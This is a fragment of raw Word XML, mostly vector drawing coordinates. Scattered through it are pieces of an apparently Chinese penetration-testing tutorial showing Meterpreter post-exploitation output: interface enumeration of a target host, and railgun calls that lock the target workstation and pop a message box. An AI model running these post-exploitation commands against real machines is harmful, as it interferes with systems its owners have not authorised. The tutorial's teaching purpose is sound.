829,6417,10829,6417,10829,6417,10829,6417,10829,6417,10829,6417,10829,6417,10829,6417,10829,6417,10829,6417,10829,6417,10829,6417,10829,6417,10829,6417,10829,6417,10829,6417,10829,6417,10829,6417,10829,6417,10828,6417,10828,6417,10828,6417,10828,6417,10828,6417,10827,6417,10827,6417,10827,6417,10826,6417,10826,6417,10826,6417,10825,6417,10825,6417,10824,6417,10824,6417,10824,6417,10823,6417,10822,6417,10822,6417,10821,6417,10820,6417,10820,6417,10819,6417,10818,6417,10817,6417,10817,6417,10816,6417,10815,6417,10814,6417,10813,6417,10812,6417,10811,6417,10809,6417,10808,6417,10807,6417,10806,6417,10804,6417,10803,6417,10801,6417,10800,6417,10798,6417,10797,6417,10795,6417,10793,6417,10792,6417,10790,6417,10788,6417,10786,6417,10784,6417,10782,6417,10780,6417,10778,6417,10775,6417,10773,6417,10771,6417,10768,6417,10766,6417,10763,6417,10760,6417,10758,6417,10755,6417,10752,6417,10749,6417,10746,6417,10743,6417,10740,6417,10736,6417,10733,6417,10730,6417,10726,6417,10723,6417,10719,6417,10715,6417,10712,6417,10708,6417,10704,6417,10700,6417,10696,6417,10691,6417,10687,6417,10683,6417,10678,6417,10673,6417,10669,6417,10664,6417,10659,6417,10654,6417,10649,6417,10644,6417,10639,6417,10633,6417,10628,6417,10622,6417,10617,6417,10611,6417,10605,6417,10599,6417,10593,6417,10587,6417,10581,6417,10574e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:325.500pt;margin-top:527.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6510,10550" coordsize="130,270">
        <v:shape style="position:absolute;left:6510;top:10550;width:130;height:270" coordorigin="6510,10550" coordsize="130,270" path="m6537,10574l6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6537,10574,6538,10574,6538,10574,6538,10574,6538,10574,6538,10574,6538,10574,6538,10574,6538,10574,6538,10574,6538,10574,6538,10574,6539,10574,6539,10574,6539,10574,6539,10574,6539,10574,6539,10574,6540,10574,6540,10574,6540,10574,6540,10574,6541,10574,6541,10574,6541,10574,6542,10574,6542,10574,6542,10574,6543,10574,6543,10574,6543,10574,6544,10574,6544,10574,6545,10574,6545,10574,6546,10574,6546,10574,6547,10574,6547,10574,6548,10574,6549,10574,6549,10574,6550,10574,6550,10574,6551,10574,6552,10574,6553,10574,6553,10574,6554,10574,6555,10574,6556,10574,6557,10574,6558,10574,6559,10574,6560,10574,6561,10574,6562,10574,6563,10574,6564,10574,6565,10574,6566,10574,6567,10574,6569,10574,6570,10574,6571,10574,6572,10574,6574,10574,6575,10574,6577,10574,6578,10574,6580,10574,6581,10574,6583,10574,6584,10574,6586,10574,6588,10574,6589,10574,6591,10574,6593,10574,6595,10574,6596,10574,6598,10574,6600,10574,6602,10574,6604,10574,6606,10574,6609,10574,6611,10574,6613,10574,6615,10574,6617,10574,6620,10574,6622,10574,6625,10574,6627,10574,6630,10574,6632,10574,6635,10574,6637,10574,6640,10574,6643,10574,6646,10574,6649,10574,6651,10574,6654,10574,6657,10574,6657,10574,6657,10574,6657,10574,6657,10574,6657,10574,6657,10574,6657,10574,6657,10574,6657,10574,6657,10574,6657,10574,6657,10575,6657,10575,6657,10575,6657,10575,6657,10575,6657,10575,6657,10575,6657,10575,6657,10575,6657,10576,6657,10576,6657,10576,6657,10576,6657,10576,6657,10577,6657,10577,6657,10577,6657,10578,6657,10578,6657,10578,6657,10579,6657,10579,6657,10580,6657,10580,6657,10581,6657,10581,6657,10582,6657,10583,6657,10583,6657,10584,6657,10585,6657,10586,6657,10586,6657,10587,6657,10588,6657,10589,6657,10590,6657,10591,6657,10592,6657,10593,6657,10594,6657,10596,6657,10597,6657,10598,6657,10600,6657,10601,6657,10602,6657,10604,6657,10605,6657,10607,6657,10609,6657,10610,6657,10612,6657,10614,6657,10616,6657,10618,6657,10620,6657,10622,6657,10624,6657,10626,6657,10629,6657,10631,6657,10633,6657,10636,6657,10638,6657,10641,6657,10643,6657,10646,6657,10649,6657,10652,6657,10655,6657,10658,6657,10661,6657,10664,6657,10667,6657,10671,6657,10674,6657,10678,6657,10681,6657,10685,6657,10688,6657,10692,6657,10696,6657,10700,6657,10704,6657,10708,6657,10713,6657,10717,6657,10721,6657,10726,6657,10730,6657,10735,6657,10740,6657,10745,6657,10750,6657,10755,6657,10760,6657,10765,6657,10770,6657,10776,6657,10781,6657,10787,6657,10793,6657,10799,6657,10805,6657,10811,6657,10817,6657,10823,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6657,10829,6656,10829,6656,10829,6656,10829,6656,10829,6656,10829,6656,10829,6656,10829,6655,10829,6655,10829,6655,10829,6655,10829,6655,10829,6654,10829,6654,10829,6654,10829,6653,10829,6653,10829,6653,10829,6652,10829,6652,10829,6652,10829,6651,10829,6651,10829,6650,10829,6650,10829,6649,10829,6649,10829,6648,10829,6648,10829,6647,10829,6647,10829,6646,10829,6645,10829,6645,10829,6644,10829,6643,10829,6643,10829,6642,10829,6641,10829,6640,10829,6640,10829,6639,10829,6638,10829,6637,10829,6636,10829,6635,10829,6634,10829,6633,10829,6632,10829,6631,10829,6630,10829,6628,10829,6627,10829,6626,10829,6625,10829,6624,10829,6622,10829,6621,10829,6619,10829,6618,10829,6617,10829,6615,10829,6614,10829,6612,10829,6610,10829,6609,10829,6607,10829,6605,10829,6604,10829,6602,10829,6600,10829,6598,10829,6596,10829,6594,10829,6592,10829,6590,10829,6588,10829,6586,10829,6584,10829,6582,10829,6580,10829,6577,10829,6575,10829,6572,10829,6570,10829,6568,10829,6565,10829,6563,10829,6560,10829,6557,10829,6555,10829,6552,10829,6549,10829,6546,10829,6543,10829,6540,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10829,6537,10828,6537,10828,6537,10828,6537,10828,6537,10828,6537,10827,6537,10827,6537,10827,6537,10826,6537,10826,6537,10826,6537,10825,6537,10825,6537,10824,6537,10824,6537,10824,6537,10823,6537,10822,6537,10822,6537,10821,6537,10820,6537,10820,6537,10819,6537,10818,6537,10817,6537,10817,6537,10816,6537,10815,6537,10814,6537,10813,6537,10812,6537,10811,6537,10809,6537,10808,6537,10807,6537,10806,6537,10804,6537,10803,6537,10801,6537,10800,6537,10798,6537,10797,6537,10795,6537,10793,6537,10792,6537,10790,6537,10788,6537,10786,6537,10784,6537,10782,6537,10780,6537,10778,6537,10775,6537,10773,6537,10771,6537,10768,6537,10766,6537,10763,6537,10760,6537,10758,6537,10755,6537,10752,6537,10749,6537,10746,6537,10743,6537,10740,6537,10736,6537,10733,6537,10730,6537,10726,6537,10723,6537,10719,6537,10715,6537,10712,6537,10708,6537,10704,6537,10700,6537,10696,6537,10691,6537,10687,6537,10683,6537,10678,6537,10673,6537,10669,6537,10664,6537,10659,6537,10654,6537,10649,6537,10644,6537,10639,6537,10633,6537,10628,6537,10622,6537,10617,6537,10611,6537,10605,6537,10599,6537,10593,6537,10587,6537,10581,6537,10574e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:307.500pt;margin-top:541.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6150,10830" coordsize="130,270">
        <v:shape style="position:absolute;left:6150;top:10830;width:130;height:270" coordorigin="6150,10830" coordsize="130,270" path="m6162,10844l6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6162,10844,6163,10844,6163,10844,6163,10844,6163,10844,6163,10844,6163,10844,6163,10844,6163,10844,6163,10844,6164,10844,6164,10844,6164,10844,6164,10844,6164,10844,6164,10844,6165,10844,6165,10844,6165,10844,6165,10844,6166,10844,6166,10844,6166,10844,6167,10844,6167,10844,6167,10844,6168,10844,6168,10844,6169,10844,6169,10844,6170,10844,6170,10844,6170,10844,6171,10844,6172,10844,6172,10844,6173,10844,6173,10844,6174,10844,6175,10844,6175,10844,6176,10844,6177,10844,6177,10844,6178,10844,6179,10844,6180,10844,6181,10844,6182,10844,6183,10844,6184,10844,6185,10844,6186,10844,6187,10844,6188,10844,6189,10844,6190,10844,6191,10844,6192,10844,6193,10844,6195,10844,6196,10844,6197,10844,6199,10844,6200,10844,6201,10844,6203,10844,6204,10844,6206,10844,6207,10844,6209,10844,6211,10844,6212,10844,6214,10844,6216,10844,6218,10844,6219,10844,6221,10844,6223,10844,6225,10844,6227,10844,6229,10844,6231,10844,6233,10844,6236,10844,6238,10844,6240,10844,6242,10844,6245,10844,6247,10844,6249,10844,6252,10844,6254,10844,6257,10844,6260,10844,6262,10844,6265,10844,6268,10844,6270,10844,6273,10844,6276,10844,6279,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10845,6282,10845,6282,10845,6282,10845,6282,10845,6282,10845,6282,10845,6282,10845,6282,10845,6282,10845,6282,10845,6282,10845,6282,10846,6282,10846,6282,10846,6282,10846,6282,10846,6282,10847,6282,10847,6282,10847,6282,10847,6282,10848,6282,10848,6282,10849,6282,10849,6282,10849,6282,10850,6282,10850,6282,10851,6282,10852,6282,10852,6282,10853,6282,10853,6282,10854,6282,10855,6282,10856,6282,10856,6282,10857,6282,10858,6282,10859,6282,10860,6282,10861,6282,10862,6282,10863,6282,10865,6282,10866,6282,10867,6282,10868,6282,10870,6282,10871,6282,10873,6282,10874,6282,10876,6282,10877,6282,10879,6282,10881,6282,10882,6282,10884,6282,10886,6282,10888,6282,10890,6282,10892,6282,10894,6282,10896,6282,10899,6282,10901,6282,10903,6282,10906,6282,10908,6282,10911,6282,10914,6282,10916,6282,10919,6282,10922,6282,10925,6282,10928,6282,10931,6282,10934,6282,10937,6282,10941,6282,10944,6282,10948,6282,10951,6282,10955,6282,10959,6282,10962,6282,10966,6282,10970,6282,10974,6282,10978,6282,10983,6282,10987,6282,10991,6282,10996,6282,11000,6282,11005,6282,11010,6282,11015,6282,11020,6282,11025,6282,11030,6282,11035,6282,11041,6282,11046,6282,11052,6282,11057,6282,11063,6282,11069,6282,11075,6282,11081,6282,11087,6282,11093,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6281,11100,6281,11100,6281,11100,6281,11100,6281,11100,6281,11100,6281,11100,6280,11100,6280,11100,6280,11100,6280,11100,6280,11100,6279,11100,6279,11100,6279,11100,6279,11100,6278,11100,6278,11100,6278,11100,6277,11100,6277,11100,6276,11100,6276,11100,6276,11100,6275,11100,6275,11100,6274,11100,6274,11100,6273,11100,6273,11100,6272,11100,6272,11100,6271,11100,6270,11100,6270,11100,6269,11100,6268,11100,6268,11100,6267,11100,6266,11100,6265,11100,6264,11100,6263,11100,6263,11100,6262,11100,6261,11100,6260,11100,6259,11100,6258,11100,6257,11100,6256,11100,6254,11100,6253,11100,6252,11100,6251,11100,6250,11100,6248,11100,6247,11100,6246,11100,6244,11100,6243,11100,6241,11100,6240,11100,6238,11100,6237,11100,6235,11100,6234,11100,6232,11100,6230,11100,6228,11100,6227,11100,6225,11100,6223,11100,6221,11100,6219,11100,6217,11100,6215,11100,6213,11100,6211,11100,6209,11100,6207,11100,6204,11100,6202,11100,6200,11100,6197,11100,6195,11100,6192,11100,6190,11100,6187,11100,6185,11100,6182,11100,6179,11100,6177,11100,6174,11100,6171,11100,6168,11100,6165,11100,6162,11100,6162,11100,6162,11100,6162,11100,6162,11100,6162,11100,6162,11100,6162,11100,6162,11100,6162,11100,6162,11099,6162,11099,6162,11099,6162,11099,6162,11099,6162,11099,6162,11099,6162,11099,6162,11099,6162,11099,6162,11099,6162,11098,6162,11098,6162,11098,6162,11098,6162,11097,6162,11097,6162,11097,6162,11097,6162,11096,6162,11096,6162,11096,6162,11095,6162,11095,6162,11094,6162,11094,6162,11093,6162,11093,6162,11092,6162,11091,6162,11091,6162,11090,6162,11089,6162,11088,6162,11088,6162,11087,6162,11086,6162,11085,6162,11084,6162,11083,6162,11082,6162,11081,6162,11080,6162,11078,6162,11077,6162,11076,6162,11074,6162,11073,6162,11072,6162,11070,6162,11068,6162,11067,6162,11065,6162,11064,6162,11062,6162,11060,6162,11058,6162,11056,6162,11054,6162,11052,6162,11050,6162,11048,6162,11045,6162,11043,6162,11041,6162,11038,6162,11036,6162,11033,6162,11030,6162,11028,6162,11025,6162,11022,6162,11019,6162,11016,6162,11013,6162,11010,6162,11007,6162,11003,6162,11000,6162,10996,6162,10993,6162,10989,6162,10986,6162,10982,6162,10978,6162,10974,6162,10970,6162,10966,6162,10961,6162,10957,6162,10953,6162,10948,6162,10944,6162,10939,6162,10934,6162,10929,6162,10924,6162,10919,6162,10914,6162,10909,6162,10904,6162,10898,6162,10893,6162,10887,6162,10881,6162,10875,6162,10869,6162,10863,6162,10857,6162,10851,6162,10844e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:313.500pt;margin-top:541.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6270,10830" coordsize="130,270">
        <v:shape style="position:absolute;left:6270;top:10830;width:130;height:270" coordorigin="6270,10830" coordsize="130,270" path="m6282,10844l6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6282,10844,6283,10844,6283,10844,6283,10844,6283,10844,6283,10844,6283,10844,6283,10844,6283,10844,6283,10844,6283,10844,6284,10844,6284,10844,6284,10844,6284,10844,6284,10844,6284,10844,6285,10844,6285,10844,6285,10844,6285,10844,6286,10844,6286,10844,6286,10844,6287,10844,6287,10844,6287,10844,6288,10844,6288,10844,6289,10844,6289,10844,6290,10844,6290,10844,6291,10844,6291,10844,6292,10844,6292,10844,6293,10844,6293,10844,6294,10844,6295,10844,6295,10844,6296,10844,6297,10844,6298,10844,6298,10844,6299,10844,6300,10844,6301,10844,6302,10844,6303,10844,6304,10844,6305,10844,6306,10844,6307,10844,6308,10844,6309,10844,6310,10844,6311,10844,6312,10844,6313,10844,6315,10844,6316,10844,6317,10844,6319,10844,6320,10844,6321,10844,6323,10844,6324,10844,6326,10844,6327,10844,6329,10844,6331,10844,6332,10844,6334,10844,6336,10844,6338,10844,6339,10844,6341,10844,6343,10844,6345,10844,6347,10844,6349,10844,6351,10844,6353,10844,6356,10844,6358,10844,6360,10844,6362,10844,6365,10844,6367,10844,6369,10844,6372,10844,6374,10844,6377,10844,6380,10844,6382,10844,6385,10844,6388,10844,6391,10844,6393,10844,6396,10844,6399,10844,6402,10844,6402,10844,6402,10844,6402,10844,6402,10844,6402,10844,6402,10844,6402,10844,6402,10845,6402,10845,6402,10845,6402,10845,6402,10845,6402,10845,6402,10845,6402,10845,6402,10845,6402,10845,6402,10845,6402,10845,6402,10846,6402,10846,6402,10846,6402,10846,6402,10846,6402,10847,6402,10847,6402,10847,6402,10847,6402,10848,6402,10848,6402,10849,6402,10849,6402,10849,6402,10850,6402,10850,6402,10851,6402,10852,6402,10852,6402,10853,6402,10853,6402,10854,6402,10855,6402,10856,6402,10856,6402,10857,6402,10858,6402,10859,6402,10860,6402,10861,6402,10862,6402,10863,6402,10865,6402,10866,6402,10867,6402,10868,6402,10870,6402,10871,6402,10873,6402,10874,6402,10876,6402,10877,6402,10879,6402,10881,6402,10882,6402,10884,6402,10886,6402,10888,6402,10890,6402,10892,6402,10894,6402,10896,6402,10899,6402,10901,6402,10903,6402,10906,6402,10908,6402,10911,6402,10914,6402,10916,6402,10919,6402,10922,6402,10925,6402,10928,6402,10931,6402,10934,6402,10937,6402,10941,6402,10944,6402,10948,6402,10951,6402,10955,6402,10959,6402,10962,6402,10966,6402,10970,6402,10974,6402,10978,6402,10983,6402,10987,6402,10991,6402,10996,6402,11000,6402,11005,6402,11010,6402,11015,6402,11020,6402,11025,6402,11030,6402,11035,6402,11041,6402,11046,6402,11052,6402,11057,6402,11063,6402,11069,6402,11075,6402,11081,6402,11087,6402,11093,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6402,11100,6401,11100,6401,11100,6401,11100,6401,11100,6401,11100,6401,11100,6401,11100,6400,11100,6400,11100,6400,11100,6400,11100,6400,11100,6399,11100,6399,11100,6399,11100,6399,11100,6398,11100,6398,11100,6398,11100,6397,11100,6397,11100,6397,11100,6396,11100,6396,11100,6395,11100,6395,11100,6394,11100,6394,11100,6393,11100,6393,11100,6392,11100,6392,11100,6391,11100,6390,11100,6390,11100,6389,11100,6388,11100,6388,11100,6387,11100,6386,11100,6385,11100,6384,11100,6384,11100,6383,11100,6382,11100,6381,11100,6380,11100,6379,11100,6378,11100,6377,11100,6376,11100,6375,11100,6373,11100,6372,11100,6371,11100,6370,11100,6368,11100,6367,11100,6366,11100,6364,11100,6363,11100,6361,11100,6360,11100,6358,11100,6357,11100,6355,11100,6354,11100,6352,11100,6350,11100,6349,11100,6347,11100,6345,11100,6343,11100,6341,11100,6339,11100,6337,11100,6335,11100,6333,11100,6331,11100,6329,11100,6327,11100,6324,11100,6322,11100,6320,11100,6317,11100,6315,11100,6312,11100,6310,11100,6307,11100,6305,11100,6302,11100,6299,11100,6297,11100,6294,11100,6291,11100,6288,11100,6285,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11100,6282,11099,6282,11099,6282,11099,6282,11099,6282,11099,6282,11099,6282,11099,6282,11099,6282,11099,6282,11099,6282,11099,6282,11098,6282,11098,6282,11098,6282,11098,6282,11097,6282,11097,6282,11097,6282,11097,6282,11096,6282,11096,6282,11096,6282,11095,6282,11095,6282,11094,6282,11094,6282,11093,6282,11093,6282,11092,6282,11091,6282,11091,6282,11090,6282,11089,6282,11088,6282,11088,6282,11087,6282,11086,6282,11085,6282,11084,6282,11083,6282,11082,6282,11081,6282,11080,6282,11078,6282,11077,6282,11076,6282,11074,6282,11073,6282,11072,6282,11070,6282,11068,6282,11067,6282,11065,6282,11064,6282,11062,6282,11060,6282,11058,6282,11056,6282,11054,6282,11052,6282,11050,6282,11048,6282,11045,6282,11043,6282,11041,6282,11038,6282,11036,6282,11033,6282,11030,6282,11028,6282,11025,6282,11022,6282,11019,6282,11016,6282,11013,6282,11010,6282,11007,6282,11003,6282,11000,6282,10996,6282,10993,6282,10989,6282,10986,6282,10982,6282,10978,6282,10974,6282,10970,6282,10966,6282,10961,6282,10957,6282,10953,6282,10948,6282,10944,6282,10939,6282,10934,6282,10929,6282,10924,6282,10919,6282,10914,6282,10909,6282,10904,6282,10898,6282,10893,6282,10887,6282,10881,6282,10875,6282,10869,6282,10863,6282,10857,6282,10851,6282,10844e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:560.500pt;width:12.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,11210" coordsize="250,250">
        <v:shape style="position:absolute;left:1950;top:11210;width:250;height:250" coordorigin="1950,11210" coordsize="250,250" path="m1975,11220l1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1975,11220,1976,11220,1976,11220,1976,11220,1976,11220,1976,11220,1976,11220,1977,11220,1977,11220,1977,11220,1977,11220,1977,11220,1978,11220,1978,11220,1978,11220,1979,11220,1979,11220,1980,11220,1980,11220,1981,11220,1981,11220,1982,11220,1982,11220,1983,11220,1983,11220,1984,11220,1985,11220,1986,11220,1986,11220,1987,11220,1988,11220,1989,11220,1990,11220,1991,11220,1992,11220,1993,11220,1994,11220,1995,11220,1996,11220,1997,11220,1999,11220,2000,11220,2001,11220,2003,11220,2004,11220,2006,11220,2007,11220,2009,11220,2011,11220,2012,11220,2014,11220,2016,11220,2018,11220,2020,11220,2022,11220,2024,11220,2026,11220,2028,11220,2030,11220,2033,11220,2035,11220,2038,11220,2040,11220,2043,11220,2045,11220,2048,11220,2051,11220,2054,11220,2056,11220,2059,11220,2063,11220,2066,11220,2069,11220,2072,11220,2075,11220,2079,11220,2082,11220,2086,11220,2090,11220,2093,11220,2097,11220,2101,11220,2105,11220,2109,11220,2113,11220,2117,11220,2122,11220,2126,11220,2131,11220,2135,11220,2140,11220,2145,11220,2150,11220,2154,11220,2160,11220,2165,11220,2170,11220,2175,11220,2181,11220,2186,11220,2192,11220,2197,11220,2203,11220,2209,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11220,2215,11221,2215,11221,2215,11221,2215,11221,2215,11221,2215,11221,2215,11222,2215,11222,2215,11222,2215,11223,2215,11223,2215,11223,2215,11224,2215,11224,2215,11225,2215,11225,2215,11226,2215,11226,2215,11227,2215,11227,2215,11228,2215,11229,2215,11229,2215,11230,2215,11231,2215,11232,2215,11233,2215,11233,2215,11234,2215,11235,2215,11236,2215,11237,2215,11239,2215,11240,2215,11241,2215,11242,2215,11243,2215,11245,2215,11246,2215,11248,2215,11249,2215,11251,2215,11252,2215,11254,2215,11256,2215,11258,2215,11259,2215,11261,2215,11263,2215,11265,2215,11267,2215,11269,2215,11272,2215,11274,2215,11276,2215,11279,2215,11281,2215,11284,2215,11286,2215,11289,2215,11291,2215,11294,2215,11297,2215,11300,2215,11303,2215,11306,2215,11309,2215,11313,2215,11316,2215,11319,2215,11323,2215,11326,2215,11330,2215,11334,2215,11338,2215,11341,2215,11345,2215,11349,2215,11354,2215,11358,2215,11362,2215,11367,2215,11371,2215,11376,2215,11380,2215,11385,2215,11390,2215,11395,2215,11400,2215,11405,2215,11410,2215,11416,2215,11421,2215,11427,2215,11432,2215,11438,2215,11444,2215,11450,2215,11456,2215,11462,2215,11468,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2215,11475,2214,11475,2214,11475,2214,11475,2214,11475,2214,11475,2214,11475,2213,11475,2213,11475,2213,11475,2213,11475,2212,11475,2212,11475,2212,11475,2211,11475,2211,11475,2210,11475,2210,11475,2210,11475,2209,11475,2208,11475,2208,11475,2207,11475,2207,11475,2206,11475,2205,11475,2205,11475,2204,11475,2203,11475,2202,11475,2201,11475,2200,11475,2199,11475,2198,11475,2197,11475,2196,11475,2195,11475,2194,11475,2193,11475,2191,11475,2190,11475,2189,11475,2187,11475,2186,11475,2184,11475,2183,11475,2181,11475,2179,11475,2178,11475,2176,11475,2174,11475,2172,11475,2170,11475,2168,11475,2166,11475,2164,11475,2162,11475,2160,11475,2157,11475,2155,11475,2153,11475,2150,11475,2147,11475,2145,11475,2142,11475,2139,11475,2137,11475,2134,11475,2131,11475,2128,11475,2124,11475,2121,11475,2118,11475,2115,11475,2111,11475,2108,11475,2104,11475,2101,11475,2097,11475,2093,11475,2089,11475,2085,11475,2081,11475,2077,11475,2073,11475,2068,11475,2064,11475,2059,11475,2055,11475,2050,11475,2045,11475,2041,11475,2036,11475,2031,11475,2025,11475,2020,11475,2015,11475,2010,11475,2004,11475,1998,11475,1993,11475,1987,11475,1981,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11475,1975,11474,1975,11474,1975,11474,1975,11474,1975,11474,1975,11474,1975,11474,1975,11474,1975,11473,1975,11473,1975,11473,1975,11473,1975,11472,1975,11472,1975,11472,1975,11471,1975,11471,1975,11471,1975,11470,1975,11470,1975,11469,1975,11469,1975,11468,1975,11468,1975,11467,1975,11466,1975,11466,1975,11465,1975,11464,1975,11464,1975,11463,1975,11462,1975,11461,1975,11460,1975,11459,1975,11458,1975,11457,1975,11456,1975,11455,1975,11453,1975,11452,1975,11451,1975,11450,1975,11448,1975,11447,1975,11445,1975,11444,1975,11442,1975,11440,1975,11439,1975,11437,1975,11435,1975,11433,1975,11431,1975,11429,1975,11427,1975,11425,1975,11423,1975,11421,1975,11418,1975,11416,1975,11413,1975,11411,1975,11408,1975,11406,1975,11403,1975,11400,1975,11397,1975,11394,1975,11391,1975,11388,1975,11385,1975,11382,1975,11378,1975,11375,1975,11372,1975,11368,1975,11364,1975,11361,1975,11357,1975,11353,1975,11349,1975,11345,1975,11341,1975,11337,1975,11332,1975,11328,1975,11323,1975,11319,1975,11314,1975,11309,1975,11304,1975,11300,1975,11294,1975,11289,1975,11284,1975,11279,1975,11273,1975,11268,1975,11262,1975,11256,1975,11250,1975,11245,1975,11238,1975,11232,1975,11226,1975,11220e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:614.400pt;width:467.400pt;height:39.0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MTU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1520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IPv4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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114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23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#&lt;Rex::Post::Meterpreter::Extensions::Stdapi::Net::Interface:0x000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055aee92c5770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@index=65539,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@mac_addr="\x00\f)\x85\xD6}",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@mac_name="Inte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l(R)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PRO/1000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MT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Network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Connection",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@mtu=1500,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@flags=nil,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@addrs=["19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2.168.1.119"],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@netmasks=["255.255.255.0"],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@scopes=[]&gt;,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#&lt;Rex::Post::Met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erpreter::Extensions::Stdapi::Net::Interface:0x000055aee92c5220</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@index=1,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@mac_addr="",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@mac_name="MS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Loopback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interface",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@mtu=1520,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@flags=ni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l,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@addrs=["127.0.0.1"],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@netmasks=[],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@scopes=[]&gt;]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="109" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="9503" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="2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31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25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6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锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>定注销目标机：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railgun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user32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LockWorkStation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{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"GetLastError"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"ErrorMessage"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"\xB2\xD9\xD7\xF7\xB3\xC9\xB9\x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A6\xCD\xEA\xB3\xC9\xA1\xA3"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"return"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true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}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9593" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="30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40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9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调用Mes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sageBox：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="15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railgun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user32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MessageBoxA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"Micropoor"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"Micropoor"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"MB_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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OK"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282.500pt;width:0.500pt;height:52.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,5650" coordsize="10,1050">
